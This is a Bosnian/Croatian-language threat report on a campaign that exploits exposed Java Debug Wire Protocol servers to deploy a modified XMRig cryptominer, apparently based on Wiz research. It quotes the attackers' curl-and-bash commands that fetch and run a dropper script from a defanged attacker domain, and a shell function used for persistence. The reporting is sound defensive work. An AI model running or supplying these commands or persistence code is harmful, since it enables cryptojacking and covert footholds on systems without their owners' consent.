Nova serija kibernetičkih napada usmjerena je na organizacije koje nehotice izlažu Java Debug Wire Protocol (JDWP) servere na internet. Napadači iskoriste ovu zanemarenu ulaznu tačku za implementaciju sofisticiranog zlonamjernog softvera za rudarenje kriptovaluta.
JDWP, standardna značajka Java platforme, namijenjen je olakšavanju udaljenog otklanjanja grešaka omogućavajući programerima da pregledaju aplikacije uživo. Međutim, kada JDWP ostane dostupan na produkcijskim sistemima, često zbog pogrešne konfiguracije ili korištenja razvojnih zastavica u okruženjima uživo, postaje moćan vektor za daljinsko izvršavanje koda.
Pojava ove prijetnje obilježena je brzim ciklusima eksploatacije. U nekoliko viđenih incidenata, napadači su uspjeli kompromitirati ranjive strojeve u roku od nekoliko sati od izlaganja.
Tok napada obično započinje masovnim internetskim skeniranjem otvorenih JDWP portova, najčešće porta 5005. Nakon identifikacije mete, napadač inicira JDWP rukovanje kako bi potvrdio da je usluga aktivna, a zatim uspostavlja sesiju, stječući interaktivni pristup Java Virtual Machine (JVM). Ovaj pristup omogućava napadaču da nabroji učitane klase i poziva metode, što na kraju omogućava daljinsko izvršavanje naredbi na hostu.
Analitičari iz Wiz-a identificirali su ovu kampanju nakon promatranja pokušaja eksploatacije na njihovim honeypot serverima koji pokreću TeamCity, popularan CI/CD alat. Napadači su pokazali visok stupanj automatizacije i prilagođavanja, implementirajući modificirani XMRig kriptorudar s kodiranom konfiguracijom kako bi izbjegli otkrivanje.
Značajno je da je zlonamjerni softver koristio posrednike rudarskih bazena kako bi prikrio adresu odredišnog novčanika, otežavajući napore za praćenje ili prekidanje ilegalne operacije rudarenja. Utjecaj ovih napada je značajan. Zloupotrebom JDWP, prijetnje entiteti mogu ne samo implementirati kriptorudare, već i uspostaviti duboko uporište, manipulirati sistemskim procesima i potencijalno se proširiti na drugu imovinu unutar kompromitiranog okruženja. Skrivena priroda tereta, u kombinaciji s njegovom sposobnošću da se uklopi u legitimne sistemske uslužne programe, povećava rizik od dugotrajnih nedetekriranih aktivnosti i iscrpljivanja resursa.
Fokusirajući se na mehanizam infekcije, napadači iskorištavaju nedostatak autentifikacije JDWP-a kako bi ubrizgali i izvršili shell naredbe izravno putem protokola. Nakon uspostavljanja sesije, obično preuzimaju dropper skriptu – poput logservice.sh – koristeći naredbe kao što su:
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh
Ova skripta je osmišljena da zaustavi konkurentne rudare, preuzme zlonamjerni XMRig binarni kod prerušen u logrotate i instalira ga u direktorij za konfiguraciju korisnika. Skripta zatim postavlja više mehanizama postojanosti, uključujući izmjenu datoteka za pokretanje shella, stvaranje cron poslova i instaliranje lažne sistemske usluge. Sljedeći izvadak ilustrira kako skripta osigurava postojanost putem konfiguracije shella:
add_to_startup() {
if [ -r “$1” ]; then
if ! grep -Fxq “$EXEC >/dev/null 2>&1” “$1”; then
echo “$EXEC >/dev/null 2>&1” >> “$1”
fi
fi
}
Lanac infekcije je i učinkovit i otporan, omogućavajući kriptoruvaru da preživi ponovno pokretanje i prijave korisnika. Korištenje naziva procesa i lokacija sustava koji zvuče legitimno od strane napadača dodatno komplicira napore za otkrivanje i ispravljanje pogrešaka, naglašavajući potrebu za budnim upravljanjem konfiguracijom i robusnim nadzorom izloženih usluga.